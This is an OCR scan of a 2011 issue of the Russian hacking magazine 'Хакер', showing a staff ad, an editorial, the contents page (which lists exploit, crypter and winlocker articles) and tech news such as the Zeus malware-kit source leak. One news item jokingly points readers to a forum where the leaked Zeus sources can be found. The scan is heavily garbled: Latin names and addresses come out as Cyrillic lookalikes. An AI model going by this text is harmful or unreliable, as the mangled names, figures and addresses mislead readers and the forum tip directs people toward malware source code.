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Основные приметы: 

На вид 18-25 лет 

Читает журнал Хаиер и мечтает в нем поработать 
Знает слова «Х55» и «Неар оѵегііоілг» 

Умеет и любит лечить БОЬ-инъеиции от слепоты 

'Л, А 

В курсе, чем пиІІ-ЬуІе отличается от дідаЬуІе . , 

Предпочтет поездку на Віаск На! алкотуру в Ебипте 
С первого раза отличает хорошую статью от плохой 
Способен связать больше 5 слов в читаемое предложение 
Готов к жестиой работе по вербовие новых авторов 
Умеет читать технические теисты на английском 





Обращаться на адрес пікі!ог@геа1.хакер.гц 
со стропой «Ѵ2ІаОМ» в теме письма » . 
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150 месяцев назад, холодный послекризисный февраль 1999 года. 

Митинский радиорынок, глючный сііаі-ир, трехдюймовые дискеты, 
ОАІ_пе1:, Репбит ММХ и пиратская копия ѴѴі псіоѵѵз 98 на царапаном 
диске. Вечно занятые ВВ5 уже не в моде, зато ночной интернет- 
анлим — мечта любого юного гика и предмет для разногласий с 
родителями. Генофонд пока в норме: с 80 по 85 год страна произ- 
водила 2-3 миллиона детей в год, и к концу девяностых в России 
оказалось больше 10 миллионов тинэйджеров, ищущих свое при- 
звание, предмет для мощного увлечения на всю жизнь. Кто-то 
выбрал балтику-девятку перед школой по 10 рублей за бутылку, 
кто-то шприц с мутной жижей на лестничной площадке. Но было 
немало и тех, кто страстно жаждал узнать ір ламера в чате и про- 
патчить маздай, чтобы через шары не уперли дайлап. Учитывая, что 
ларьки с прессой были заполнены рецептами лечения геморроя по 
авторской методике «моча, гусиный помет и зверобой», 1999 год 
— несомненно, лучшее в истории человечества время для запуска 
журнала компьютерных хулиганов. 



Сейчас, спустя 12.5 лет, очень круто и приятно анализировать путь, 
пройденный журналом. Приятно осознавать, что Хакер всегда 
менялся для читателей: иногда предугадывая и формируя интерес, а 
иногда — следуя уже самостоятельно оформившимся потребностям. 
Приятно понимать, что журнал выполнил важнейшую роль: воодуше- 
вил в сложное время десятки тысяч молодых парней на саморазви- 
тие и самообучение, показал им светлую и веселую сторону техноло- 
гий, заставил заниматься ІТ и развивать технологии в нашей стране. 

Аплодисменты людям, которые создали Хакер и на разных этапах 
сопровождали журнал эти 12.5 лет: Игорю Пискунову, Синтезу, Феде 
Добрянскому, Холоду, Данечке, Ядовитому, Курту, Мишгану, Мэлу, 
Реланиуму, Кибизоиду, Сайдексу, Мише Терехову, Максу Зеленко, 
МЛ.АзЬ’у, Куттеру, Бублику, Хинту, Симбиозису, Олегу N50, Руслану 
Рубанскому, Кириллу Петрову, Косте Обухову, Саше Лозовскому, 
Андрею Матвееву, Форбу, Длинному, Горлуму и Степу. Респект! 



пікііогг, главред X 
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МедаЫеѵѵз 

004 Все новое за последний месяц 

Реггит , 

016 Доступное ускорение 

Тестирование 550-накопителей небольшого объема 

022 Кн ига без «чернил» 

Обзор электронной читалки ѴѴЕХБЕР.ВООКТ7002 

РС_2опе . 

024 АпсІгоісІ-марионетки 

Система управления всеми устройствами на АпбгоісІ: что это? 

028 7 трендов веб-разработки 201 1 

Инструменты прогрессивных девелоперов 

033 Колонка редактора 

Немного о системах аунтефикации 

034 Опасныеобновления 

Заражение системы через механизм автоапдейтов 
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044 Обзор эксплоитов 
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050 Безопасность расширений 

веб-браузеров. Очередь Орега 
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Анализ защищенности АСУТП 

060 Безопасность платежей 

Интересных схемы и статистика 

062 Обаусвоими руками 

Ищем уязвимость и пишем эксплойт для Мизіс Макег 16 

066 Х-Тооіб 

Программы для взлома 

МАІ.ѴѴАКЕ . 

068 Как работают винлокеры? 

Чтобы узнать больше, отправь весьтекст этой 
статьи на короткий номер... 

072 Ну, антивирус, погоди! 

Создаем ЕХЕ-криптор на РуіЛоп'е 

Сцена 

076 Розіііѵе Наск Бауз201 1 

Отчете Международного Форума 
по практической безопасности 

080 Чемпионаты по программированию 

Ломать, программировать и получать деньги? Легко! 



Юниксойд . 

084 Кроем одежку 

Самостоятельная сборка и оптимизация КБЕ4 и 01Ч0МЕЗ 

088 Прокачай свой ноутбук! 

«МизІ Ітаѵе» софт для владельцев ноутбуков 

094 Энергия полураспада 

Обзор самых интересных форков последнего времени 
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098 «Социальный» кодингна сишарпе 

Покоряем ОгорЬох.ѴК, Еіікг 
и ЕасеЬоок одним ударом 

102 Откапываем яблоданные 
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110 Программерскиетипсы итриксы, 
спецвыпуск: ТББ и Апбгоіб 

Изучаем модульноетестирование в сфере мобильного 
программинга 

5ѴЫ/АСК . 

114 Потрогай Сібсо 

Популярные решения в области безопасности 

118 Чертовски хороший І_АМР 

Пошаговое руководство по установке стека 
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124 Виртуальный полигон 

Управляем фермой виртуальных серверов легко 
и непринужденно 

РНКЕАКІЫ6 . 

130 КіпесЕ разминка для гика 

Разбираемся с новым девайсом и учимся писать 
под него приложения 

136 Чемоданчикдля загородного 
выживания 

Собираем летний гик- на бор в одном чемоданчике 

Юниты 

140 РАСШЫГГЕБ 

Большой РАО 

143 Диско 

8.5 Гб всякой всячины 

144 ѴѴѴѴѴѴ2 

Удобные ѵѵеЬ-сервисы 
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Система управления всеми устройствами 
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Энергия полураспада 

Обзор самых интересных форков последнего времени 
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Собираем летний гик-набор в одном чемоданчике 
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МЕ6АЫЕШ5 



Мария «МИтіИ» Нефедова (тіТгіШЭгеаІ. хакер. ги ) 




Медапеѵѵз 

КОШЕЛЕК И МУЗЫКА ОТ бООбЬЕ 



поисковым гигантом, и запускдвух новых 
сервисов — лишнее тому подтверждение. 
Компания, наконец, анонсировала долгождан- 
ный сервис мобильных платежей. Он получил 
имя Ооодіе ѴѴаІМ и был разработан в сотруд- 
ничестве с Сііідгоир, МазІегСагсІ, Рігзі Баіа и 
американским оператором ЗрппС О подобных 



сервисах, позволяющих превратить мобильный 
телефон в кошелек, мы рассказывали раньше 
(например, о ВІіпдТад]. Обычно они предпо- 
лагают использовать модуль І\ІРС (ІЧеаг Ріеісі 
Соттипісаііоп). Если такового в устройстве 
нет, то Ооодіе предлагает использовать специ- 
альные ЫРС-стикеры. Пока Ооодіе ѴѴаІІеі пла- 
нируется за пустить только на смартфонах под 
управлением АпбгоісІ, однако в Ооодіе уверяют, 
что компания будет «сотрудничать со всеми», 
если поступят соответствующие предложения. 
Когда состоится запуск Ооодіе ѴѴаІІер пока не 
сообщается, зато вокруг сервиса уже успел 
разгореться скандал. В суд на Ооодіе собирают- 
ся подавать компании еВау и РауРаІ, обвиняя 
«Гугл» в краже коммерческой информации. 
Дело в том, что некоторое время назад Ооодіе и 
еВау вели переговоры о запуске новой онлай- 
новой платежной системы. Со стороны еВау 
«переговорщиком» выступал Усама Бедье, ко- 
торый перед самым подписанием соглашения 
внезапно решил уволиться и перейти работать 




Обо всем 
за последний 
месяц 




к. 




в... Ооодіе. В начале 201 1 года Бедье получил 
должность, ни много ни мало, вице-президента 
Ооодіе, а на должность вице-президента по 
электронной коммерции пришел еще один 
«перебежчик» — Стефани Тилениус, ключевая 
сотрудница РауРаІ. В е Вау утверждают, что эти 
двое обладали стратегически важной инфор- 
мацией по всем аспектам работы платежной 
системы. Что характерно, презентацию сервиса 
Ооодіе ѴѴаІІеІ в Нью-Йорке проводили именно 
Бедье и Тилениус. Похоже, искотеВау и РауРаІ 
действительно не заставит себя ждать. 

Второй анонс был менее громким — Ооодіе в ре- 
жиме бета -теста запустил музыкальный сервис 
(пока только для жителей США]. Теперь каждый 
пользователь может за грузить туда «в Гугл» 20 
ОООтреков, после чего они ста нут доступны ему 
с других компьютеров и с мобильныхустройств. 
Для сервиса выпущено специальное АпбгоісІ- 
приложение. Кстати, скачивать загруженную 
музыку нельзя, только слушать в потоковом 
режиме — борьба с пиратством. 



В марте, входе операции по аннигиляции ботнета Ризіоск, были изъяты 
десятки жестких дисков. МісгозоН сообщает, что на них нашлось много 
интересного: к примеру, в одном файле содержалось 427 000 ешаіі-адресов. 

ФАРМЕРЫ ПОНЕВОЛЕ 

Любителям ММОРПГ известно, что во всех мало-мальски популярных 
онлайновых играх пышным цветом процветает бизнес наших восточ- 
ных братьев. Корейцы и китайцы (в основном китайцы] прокачиваютза 
реальные деньги персонажей, продают игровые вещи, добывают для по- 
следующей продажи различные внутриигровые раритеты, или же честно 
итупофармят голд. Самое забавное втом, что за ни маются таки ми делами 
нетолько боты, но и живые люди, все же за ботоводство в солидных играх 
можно очень быстро получить бан. Но кто бы мог подумать, что иногда 
люди делаютэто вовсе не по собственной воле. Британское издание «ТЬе 
Оиагсііап» опубликовало интересную информацию: корреспондент брал 
и нтервьюу бывшего заключенного, отбывавшего наказание втрудовом 
лагере Цзиси (китайская провинция Хэйлунцзян). Согласно показаниям 
бедняги, днем узники в их поселении работали наугольной шахте по 12 
часов, а ночью занималисьфармингом! Предприимчивое руководство 
лагеря решило подзаработать и заставляло 300 человек посменно играть 
в ѴѴогІб оІѴѴагсгаИ Компьютеры работали круглосуточно, в день «зеки» 
могли приносить до 5000-6000 юаней, то есть порядка $900. Разумеется, 
самиударники виртуально го труда этихденегне видели, все уходило в 




карман администрации. За невыполнениеустановленной дневной нормы 
фарма заключенных подвергали физическим наказаниям. Втаких чудо- 
вищныхусловиях даже самый ярый фанатонлайновых игр, скорее всего, 
возненавидел бы их на всю оставшуюся жизнь, что говорить о бедных за- 
ключенных. Как метко подмечает шокированная сетевая общественность: 
вотона, колония XXI века — зал видеоигр. 
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Корпорация ІпТеІ ©201 0 г. Все права защищены. ІпТеІ, логотип ІпТеІ, ІпТеІ Соге и Соге являются товарными знаками на территории США и других стран. Реклама. 

*Другие наименования и товарные знаки являются собственностью своих зако иных владельцев 




МЕ6АЫЕШ5 



СВЕЖИЕ «МАКИ» +70% К ПРОИЗВОДИТЕЛЬНОСТИ 



Компания Арріе продолжает планомерное обновление своей про- 
дукции. На этот разтрадиционной «доработке» подверглись ком- 
пьютеры і Мае, в последнее время несправедливо забытые на фоне 
іРасІ, іРЬопе и иже с ними. Теперь доступно четыре конфигурации 
моноблоков: 

21 ,5 м , четырехядерный процессор Іпіеі Соге І5 с частотой 2,5 ГГц, ви- 
деоадаптер АМР 6750М с памятью ООЭР5 объемом 512 Мб, жесткий 
диск объемом 500 Гб, цена в США — $1 199; 

21 .5", І5 2,7 ГГц, АМР 6770 М 512 Мб, жесткий диск 1 Тб, $1499; 

27 м , І5 2,7 ГГц, АМЭ6770М 512 Мб, жесткий диск 1 Тб, $1699; 

27", І53.1 ГГц, АМЭ 6970М 1 Гб, жесткий диск 1 Тб, $1999. 

Как видишь, новые «Маки» обладают мощными четырехядерными 
процессорами I пТеІ Соге і 5, а при покупке также имеется возмож- 
ность выбрать процессор Соге І7 с частотой до 3,4 ГГц, установить 
дополнительный жесткий диекдо 2 Тб, 550-накопитель объемом 256 
Гб, и увеличить ОЗУ до 8 Гб. Также новое поколение іМас, это первые 
настольные компьютеры на рынке, оснащенные интерфейсом ввода/ 
вывода ТЬипсІегЬои (один порт для 21 ,5-дюймовой модели и два для 
27-дюймовой]. 

К нововведениям можно отнести и камеру РасеТіте НО с поддержкой 
видео высокого качества. В остальном серьезных изменений нет: ІМас 
по-прежнему выполнены в корпусе из алюминия и стекла, базируются 




на ІР5-матрицах, имеют порт РігеѴѴіге 800, 4 порта 05В 2.0, считыва- 
тель карт50ХС, оптический привод 5ирег0гіѵе (ОѴО-ВѴѴ), порт ѲідаЬМ: 
Вбегпеі: и адаптеры ѴѴі-Рі (802.1 1 п 2,4/5 ГГц и В ІиеІіооІіЬ 2.1+ЕЭР). Обнов- 
ленная линейка макинтошей уже в продаже. 



» Компания Зеадаіе представила первый в мире жесткий диск типоразмера 
3,5 дюйма, на каждой пластине которого хранится 1 Тб информации. Этот 
показатель соответствует рекордной удельной плотности записи 625 Гбит/ 
кв.дюйм. 



30 ЛЕТ ЗА ПОДДЕЛЬНЫЕ КУПОНЫ 




Это, пожалуй, было бы смешно, если бы не было так печально. В Сое- 
диненных Штатах судят 22-летнего студента Рочестерского техноло- 



гического института по имени Лукас Хендерсон, и парню грозит до 30 
лет тюрьмы. Нет, этот будущий ІТ-шник не воровал тысяч банковских 
карт, не ломал популярные онлайновые сервисы и не совал свой нос 
в правительственные сети. Лукас прикола ради распространял через 
имейджборды (вроде 4сбап и /окіеі:] поддельные скидочные купоны, 
которые сам же и «рисовал». Особо отметим, что он не заработал 
на этом ни цента. Однако правоохранительные органы сообщают, 
что общий убыток от действий Хэндерсона составляет сотни тысяч 
долларов. Горе-любитель халявы не мелочился, он распространял 
купоны самых разных мастей, от скидок на стиральные порошки до 
5опу РІау5і:а1:іоп. Интересно и то, что парень неплохо заметал следы, 
юзал прокси, Тог, но в итоге засветился, глупо потеряв бдитель- 
ность, — опубликовал пару постов безо всяких ухищрений со своего 
университетского ІР. Теперь, как уже сказано выше, ему грозит весьма 
длительный тюремный срок. 



» 0горЬох раскрыл статистику, согласно которой пользователи сохраняют 
300 млн файлов ежедневно. Это более миллиона файлов каждые 5 минут! 
В целом юзеры ОгорЬох сохранили уже более 100 млрд файлов. 
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Умная производительность, 
и это видно. Убедитесь сами. 

2-е поколение процессоров Іп!еі Сеге* 1 «5 




Ппиѵ/вгтт/мто пззишп/ г Іп+Ы® Іпсігіо ® 





Круче, чем 
вареные яйца! 

Персональный компьютер МісгоХреПз на базе 
процессора ІпЫ® Соге™ І5 2-ого поколения 

Ш ІЛЛІІЯвИТ Пр-т Андропова д. 22/30, стр. 1 
к іиі II ѴІИ“ I 1495) 257-42-41 | ѵлѵѵѵ.иітагг.ги 



N С I РИж! .-ЕОІГѴ^ЧІ ГЩ 
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МЕ6АЫЕШ5 




КОМПАКТНОЕ АУДИО ОТ 
ЕОІГІЕК 

Компании Есі іТіег выпустила интересный гаджет — компактную, портативную аудиосистему МР1 5 
со встроенным МРЗ-плеером, которую можно подключить клюбому источнику звука. Большим 
плюсом является то, что система может работать от встроенного аккумулятора (зарядка осу- 
ществляется по ІІЗВ-кабелю], а одного полного заряда хватит на 6 часов воспроизведения. Это 
позволяет использовать гаджет какдома.таки вдали от цивилизации — автономно. Новинку 
действительно удобно братьссобой: размеры оченьскромны — 200x60x33 мм, а вес равен всего 
200 граммам. Аудиосистема МР1 5 поддерживаетЗР-карты и совместима со всеми аудиоформа- 
тами. Качественный звук обеспечивается современными магнитно-экранированными динами- 
ками 2x1,5" (40мм] салюминиевой мембраной. Управление звуком и встроенным МРЗ-плеером 
осуществляется при помощи удобных прорезиненных кнопок, расположенных на верхнем ребре 
корпуса. 



» Корпорация Зутапіес совместно с Профессионалы.ру провели опрос, 
в ходе которого выяснили, что 70% сотрудников компаний выносят 
корпоративную информацию из закрытых внутренних сетей, 68% - пользуются 
на работе социальными сетями, а более 56% опрошенных вообще унесли бы 
с собой на флешке не просто корпоративную, но и строго конфиденциальную 
информацию. 



ЭТОЙ МЫШИ НЕ НУЖНЫ ПРИЕМНИКИ И ПЕРЕДАТЧИКИ 




Современная публика уже давно привыкла 
к различным беспроводным гаджетам, но 
компания НР решила удивить искушенных 
компьютерщиков и выпустила в продажу 
«грызуна», сообщающегося с компьютером 
посредством ѴѴі-Рі. Новинка получила неза- 
мысловатое название ѴѴі-Рі МоЬіІе Моизе и, 
как гласит официальное заявление НР, это 
первая в индустрии компьютерная мышь, 
использующая интерфейс ѴѴі-Рі (технология 
І_іпк-5]. У новинки есть один неоспоримый 
плюс — для работы ей не нужны никакие 
приемники сигнала, которые, как правило, 
являются обязательным элементом для бес- 
проводных девайсов. ѴѴі-Рі МоЬіІе Моизе под- 



ключается к компьютеру напрямую, то есть из 
ІІЗВ-портов ничего лишнего торчать не будет. 
Радиус действия девайса — 10 м, а срокрабо- 
ты на одном комплекте батарей типоразмера 
АА — 9 месяцев. Очень неплохо, согласись? 

Но это еще не все. Хотя устройство и позицио- 
нируется НР, как компактное и мобильное, 
разработчики подумали и о его функциональ- 
ности: НР ѴѴі-Рі МоЬіІе Моизе оснащена пятью 
программируемыми кнопками и четырехпози- 
ционным колесом. Ктомуже, мышка исполь- 
зует лазерную систему позиционирования, 
где частота опроса датчика составляет 1 600 
отсчетов на дюйм (СРІ). Цена гаджета в Европе 
составляет$50. 



ЯВА ЗОЛОТАЯ ТУРБО 






Хорошо известная на российском рынке марка «Ява Золотая» представляет новику — сигареты «Ява Золотая 
Турбо», отвечающие всем новейшим тенденциям в данной области. Особенности конструкции фильтра позволя- 
ют потокам воздуха и дыма смешиваться в полой воздушной камере, обеспечивая этим мягкость и сбалансиро- 
ванность вкуса. Такой вид фильтра уже широко используется в сигаретах премиум-класса в разных странах мира 
— теперьэта технология применяется и в «Яве Золотой Турбо». Новинка предлагается водной версии насыщен- 
ности вкуса. Содержание в дыме сигареты: смолы — 7 мг, никотина — 0,6 мг, СО — 8 мг. Максимальная розничная 
цена на «Ява Золотая Турбо» составит 25 рублей. 

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ 
КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 







Затзипд САІ-АХѴ ^7 П 



Быстрый 



Двухъядерный процессор 1,2 Ггц 
задает новый уровень 
производительности 



Яркий 
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ЗІРЕВАМОІЕО РІиз 

гарантирует совершенную яркость цветов 
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Тонкий 



Толщина 8,49 мм 
определяет уникальный дизайн 




«шиш 






Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 

ѵѵш/.затзипд.сот. Товар сертифицирован. Реклама. 
ЗІІРЕВ АМ0І.Е0 РІиз - сверхъяркий экран высокого разрешения. Саіаху - Галактика. 








МЕ6АЫЕШ5 



ГЕЙМЕРЫ НА СЛУЖБЕ АРМИИ 




Американские военные очень стараются идти в ногу с прогрессом, мыс- 
лить нестандартно и обратить глобализацию в свою пользу. Порой из со- 
вокупности этихфакторов рождаются оченьсмешные вещи. Признаться, 
узнав о новой затее ВМФ США, мы поначалу решили, что эта запоздав- 



шая первоапрельская шутка, но нет, оказалось, что все серьезно. Амери- 
канцы придумали привлечькрешению проблемы сомалийских пиратов... 
геймеров. Нет, мы не шутим. Они тоже. Армейские специалисты всерьез 
полагают, что геймеры, закаленные годами игры в стратегии и ММОРПГ, 
сумеютпомочь в разработке новой методики борьбы ссомалийцами. 

Для этих целей был создан проект Маззіѵе МиШрІауегОпІіпе ѴѴагбате 
І_еѵегадіпд Ше Іпіегпеі (ММОѴѴбЫ), найти которой можно по адресу 
ттоѵѵаіі.прз.есіи . Это будет не что иное, каконлайновая игра, в которой, 
как несложно догадаться, будут моделироваться условия, максималь- 
но приближенные к реалиям. Запуск ММ0ѴѴ6Ы состоится этим летом. 
Вообще-то, игра должна была уже стартовать, однако слишком много 
людей выразили желание поучаствовать в проекте, так что релиз пока от- 
ложили. Тем не менее, уже известно, что игра будет разбита натри раунда, 
каждый из которых будет длиться неделю. Игрокам придется не просто 
ходить под парусом и постреливать по врагу из всех орудий, но вырабаты- 
вать стратегию, оценивать риски, составлять самые настоящие военные 
планы. Также геймеры получат возможность голосовать за идеи других 
участников игры, выбирая оптимальные варианты развития событий. 
Позавершении виртуальных баталий, ВМФ США систематизирует по- 
лученные данные и получитна руки множество новых, вероятно, весьма 
нестандартных идей по борьбе с сомалийцами. Такой воторигинальный 
краудсорсинг от а мери канских военных. 



» Ассоциация производителей программного обеспечения обнародовала 
ежегодный отчет, согласно которому в 2010 году ущерб от пиратства в 
России составил около 3 млрддолларов. 



А КИБОРГОВ ВСЕ БОЛЬШЕ И БОЛЬШЕ 




Слово «киборг», придуманное Манфредом 
Клайнсом и Натаном Клином еще в 60-х годах 
прошлого века, уже давно перебралось со 
страниц фантастических романов в нашу 
жизнь. Как очень тон ко отмечает один из 



основателей жанра киберпанкУильям Гибсон: 
«Киберпанкуже здесь, просто пока он распре- 
делен очень неравномерно». Действительно, 
пока мы не сталкивается с проапгрейджен- 
ными людьми на каждом шагу, но, возможно, 
подобные времена уже недалеко. Случаи, 
когда людям после травм устанавливали био- 
нические протезы, уже известны (хотя пока 
их единицы], но теперь поя вился и первый 
киборг по доброй воле. Двадцати шести - 
летний серб по имени Майло согласился на 
добровольную ампутацию кисти руки, чтобы 
поставить на ее место бионический про- 
тез! Стоит отметить, что несколько лет назад 



Майло все же попал в автокатастрофу, и его 
рука по сей день практически парализована. 
Тем не менее, шаг все равно смелый. Новый 
бионический протез, который врачи при- 
шьют пациенту вместо его собственной руки, 
выглядит почти как настоящая кисть, умеет 
захватывать и удерживать мелкие (и довольно 
хрупкие] вещи. Работаетустройство, под- 
чиняясь командам мозга владельца, которые 
воспринимает благодаря датчиками, что кре- 
пятся кнервам предплечья. На иллюстрации, 
кстати, не Майло, а самый первый на Земле 
чел о век с бионическим протезом — 24-летний 
австриец Патрик. 



НОУТБУК НА СОЛНЕЧНЫХ БАТАРЕЯХ 



На ежегодном африканском форуме в Найроби 
компания Заппзипд представила весьма любо- 
пытную разработку. Пусть пока это лишь анонс и 
прототип, потенциал удевайса можетока- 
заться большой. Затзипд объявил о создании 
ноутбука, работающего на солнечных батареях. 
Прототип показали публике, можно сказать, 



издалека — все, что пока о нем известно, это на- 
звание: N021 55. Технические характеристики 
и какие бы то ни было подробности не разгла- 
шались. Разработка, по словам представителей 
компании, ориентирована на африканцев и 
другихжителей развивающихся стран, где с 
электричеством большие проблемы (чаще всего 



выражающиеся в полном его отсутствии]. Если 
все это не громкие слова и не сырой концепт, до 
воплощения которого еще далеко, то подобное 
устройство могло бы заинтересовать отнюдь не 
только африканцев, но и выживалыщиков, пу- 
тешественников и прочихсограждан, любящих 
забраться подальше от цивилизации. 
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■ - Система кошерного питания • это древнейшая. бережно сохраняемая 



■ | традиция еврейского народа, в ее основе лежат несколько заповедей 
.ѵ из Торы в том числе, относящиеся к здоровью животных. . ; 

1 Ученые изучали и применяли Законы каі ирута на протяжении трех тысяч лет 



Люди различных национальностей и вероисповеданий доверяют 
качеству кошерных продуктов. Во многих странах мира, кошерные ■ 
продукты питания считаются более качественными - из -за строгого 
контроля и дополни юльных требований по гигиене, нишевым добавкам 

и применению химически хетест. ' 

Идеологическую основу кошерного питания прекрасно передает 
поговорка "мм - эю ю. что мы едим". От еды напрямую зависит 





МЕ6АЫЕШ5 



ЗАКАЗУХА ВЫСШЕГО УРОВНЯ 




Как известно, навойневсе средства хороши, 
а когда речь идет о конкуренции огромных 



компаний, это и есть самая настоящая война 
— информационная. На очень неприятной 
вещи поймали компанию РасеЬоок, поймали 
буквально за руку: РасеЬоок попытался за- 
казать очернение Соодіе в прессе. С этой де- 
ликатной просьбой Цукерберг и сотоварищи 
обратились к РР-агентству Вигзоп-Мазіеііег, 
входящему в структуру крупнейшего миро- 
вого рекламного холдинга ѴѴРР, чьими 
клиентами также являются такие «монстры», 
как МісгозоЙ. Задача, поставленная перед 
пиарщиками, была проста: требовалось 
опубликовать в американских СМИ поболь- 
ше критических статей о политике Соодіе, 
аименно — о том, как поисковый гигант 
размещает в своем индексе данные (в обход 
запретов на индексацию социальных сетей). 
Нечестная игра РасеЬоок раскрылась, когда 
представители Вигзоп-Мазіеііег попытались 



заказать популярному западному блогеру 
негативный очерко Соодіе. Блогер нетолько 
отказался писать подобное, но и, выяснив 
побольше подробностей, опубликовал 
пере писку с пиарщиками на сотриіегѵѵогісі. 
сот . В прессе, разумеется, тутже поднялась 
изрядная шумиха, да такая, что припертый 
к стене РасеЬоок даже факта «заказа» от- 
рицать не стал (попросту не смог). Зато пред- 
ставители Вигзоп-Мазіеііегтеперь заявляют, 
что этот проект противоречил этическим 
нормам их агентства, ионивлюбом случае не 
собирались его выполнять. Также в Вигзоп- 
Мазіеііегуже оборвали с крупнейшей соци- 
альной сетью все отношения. Представители 
Соодіе от комментариев воздерживаются, 
что, в общем, логично — РасеЬоок и без по- 
сторонней «помощи» уже заработал большое 
пятно на своей репутации. 



» Сергей Брин, один из основателей Соодіе, рассказал, что всего около 
20% сотрудников компании пользуются ОС МісгозоН ѴѴіпгіоѵѵз. Сам Брин 
признался, что предпочитает СИготе 05. 



2Е№ - БЕСПЛАТНО, ВСЕМ И КАЖДОМУ 




После слияния воедино двухлидирующих на 
черном рынке инструментариев, Іе и5 и ЗруЕуе, 



было ясно, что грядутопределенные пере- 
мены. Мы держим руку на пульсе и стараемся 
информировать тебя о последних переменах на 
этом фронте. Последние новости таковы : 2еи5 
в своем прежнем виде, судя по всему, перестает 
существовать. Исходники малварь-кита были 
обнаружены специалистами по безопасности 
сразу в нескольких местах Сети, совершенно 
бесплатно, доступные для скачивания. Таким 
образом, продажам инструментария (чья цена 
доходила до $10 000, в зависимости отсборки) 
пришел конец. Нельзя сказать, что это очень 



здорово, таккактеперь исходники совершенно 
бесплатно попадут в руки кучи «энтузиастов», 
которые с мо гут создать с их помощью много 
всякого-разного. Кто устроил эту утечку и зачем, 
пока остается неясным. Вполне возможно, 
что авторы «Зевса» в будущем добавят в свое 
творение новые функции и продолжатторговать 
более «продвинутыми» его версиями. То есть, 
вероятно, зіапсі-аіопе-версию хоронить всеже 
еще рано. Кстати, небольшая подсказка: в поис- 
кахтех самых исходников советуем заглянуть на 
форум уѵазт. ги :). 



К0ПИРАСТЫ СТАВЯТ НОВЫЕ (АНТИ)РЕКОРДЫ 



В последнее время среди правообладателей 
считается едва ли не моветоном не судиться с 
пол ьзовател я м и . «За ра баты вать» сотн и тыся ч 
долларов на домохозяйках и студентах — это 
модно, легко и удобно. Однако большинству 
борцов за авторское право очень далеко до 
масштабов судебного разбирательства, которое 
учинила компания 115 СоругідЫ Огоир, пред- 
ставляющая интересы кинопродюсеров. 115 
СоругідЫ Огоир собирается засудить, ни много 
ни мало, 23 000 человек за скачивание боевика 
Сильвестра Сталоне «Неудержимые». Это ре- 



корддаже для американцев. Изначально в иске 
фигурировали 6500 обвиняемых, но вданный 
момент, подтверждению истца, известны уже 23 
322 ІР-адреса, и их количество, вероятно, еще 
увеличится. Судья уже разрешил компании за- 
просить у интернет-провайдеров информацию о 
пользователях, скачавшихфильм. Информация 
включаетвсебя имя, адрес, номертелефона 
и адрес электронной почты. Интересно, что на 
этот раз обвиняемым инкриминируется не рас- 
пространение фильма в файлообменных сетях, 
а лишьего скачивание. Размер штрафа за это 




может составить до $1 50 000. Впрочем, ожидает- 
ся, что большинство претензий урегулированы 
в рамках мировых соглашений, то есть после 
уплаты штрафа в размере $3000. 



► 012 
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ШИФРОВАНИЕ БЕЗ ШИФРОВАНИЯ 



Шифрование данных — штука 
хорошая, но не всегда удобная, 
ведьзачастую сам факт шифрова- 
ния действует на любознательных 
ломателей, каккраснаятряпка на 
быка (раззашифровано, значит 
что-то интересное]. Исследо- 
ватели из Университета Южной 
Калифорнии (США] и Нацио- 
нального научно-технического 
университета Пакистана (ІЧІІ5Т) 
под руководством Хасана Хана 
нашли интересную альтернативу 
современным методам защиты данных. Они предлагают использовать 
методы стеганографии и даже написали для этого специальное ПО. По 
сути, получается шифрование без шифрования: написанный исследова- 



телями софт не отдает расстановку кластеров файла на откуп контроллеру 
накопителя, а делает это самостоятельно. «Шифр»тоже довольно прост: 
если последовательно идущие кластеры расположены рядом, это озна- 
чает^ » в бинарном коде, если на расстоянии, — «О». Все что требуется 
знать, чтобы докопаться до секретной инфы — в каком файле перестав- 
лены кластеры. Дешифровка данных выполняется той же прогой, что их 
кодировала. По утверждению создателей, взломать систему практически 
невозможно, однако она имеет ряд чисто физических ограничений. Так, 
скажем, на жестком диске объемом 160 Гб можно сохранить шифровку 
размером 20 Мб. Дефрагментация для новшества тоже опасна, она может 
обернуться потерей всех данных. Также пока нельзя вносить изменения 
в уже закодированное послание — придется переделывать его заново. 

Ну и, конечно, проблемы могут возникнуть с РАТ32, где максимальный 
размер файла составляет4 Гб. Подробности можно найти по адресу 
зсіепсесІігесГсот/зсіепсе/агЦсІе/ріі/ВОІ 6740481 000088Х . но, к сожале- 
нию, только на английском языке. 




ИНТЕРНЕТ-ТЕЛЕВИЗОР ОТ ѴЕ5ТЕІ. 

Соппес1;есІ ТѴ от компании Ѵез1:еІ, это телевизор с диагональю 55 
дюймов, в который интегрированы различные «плюшки» интернет- 
инфраструктуры. Система (при помощи пульта дистанционного управ- 
ления] обеспечитлегкий доступ к некоторым интернет-страницам, даст 
возможность выбирать различные виджеты, а именно новости, погоду, ту- 
ристическую информацию, часы, видео, изображения и такдалее. Также 
телевизор позволит насладиться развлекательным контентом в формате 
30 (будьто фильмы, спортивныетрансляции, игры или фотографии], 
благодаря использованию активныхЗО-очков. 30-режим изображения 
выбирается автоматически, посредством нажатия кнопки 30 на пульте 
дистанционного управления. То есть, ты свободно можешь переключать- 
ся между режимами 20 и 30. Благодаря разработке и интеграции втеле- 
визор специального чипа и алгоритму виртуальной глубины, создается 
иллюзия глубины изображения при просмотре фильмов или фото. Также 
новинка может похвастаться функцией коллективного использования, 
высоким разрешением 30 и совместимостью со многими 30-форматами. 



На ежегодной конфереции ѴШО С 2011 было объявлено, что в настоящее 
время в мире существует 54 млн пользователей Мае, причем 3/4 из них 
являются владельцами МасВоок. 





«ЯНДЕКС» СТАЛ ПУБЛИЧНОЙ КОМПАНИЕЙ 



В конце мая состоялось знаменательное для всего Рунета собы- 
тие — компания «Яндекс» разместила акции на фондовой бирже 

ІЧА50А0. ІРО (ІпТіаІ РиЫіс 
ОТТегі пд — первоначальное 
публичное предложение акций 
компании на продажу широко- 
му кругу лиц] «Яндекса» стало 
одним из самых ожидаемых в 
этом году. Компания котируется 
под тикером ѴІ\ЮХ. Это было уже 
второе крупное ІРО российской 
интернет-компании за послед- 



ний год. Напомним, что в ноябре 201 0 года Маіі.ги Огоир разместила 
на Лондонской фондовой бирже около 1 6,8% акций. «Яндекс» начал 
торги акциями на бирже ІЧАЭРАО 24 мая в 1 8:30 по московскому 
времени, и изначально предполагалось получить после размеще- 
ния акций около 1 млрд долларов. Но все обернулось еще лучше: в 
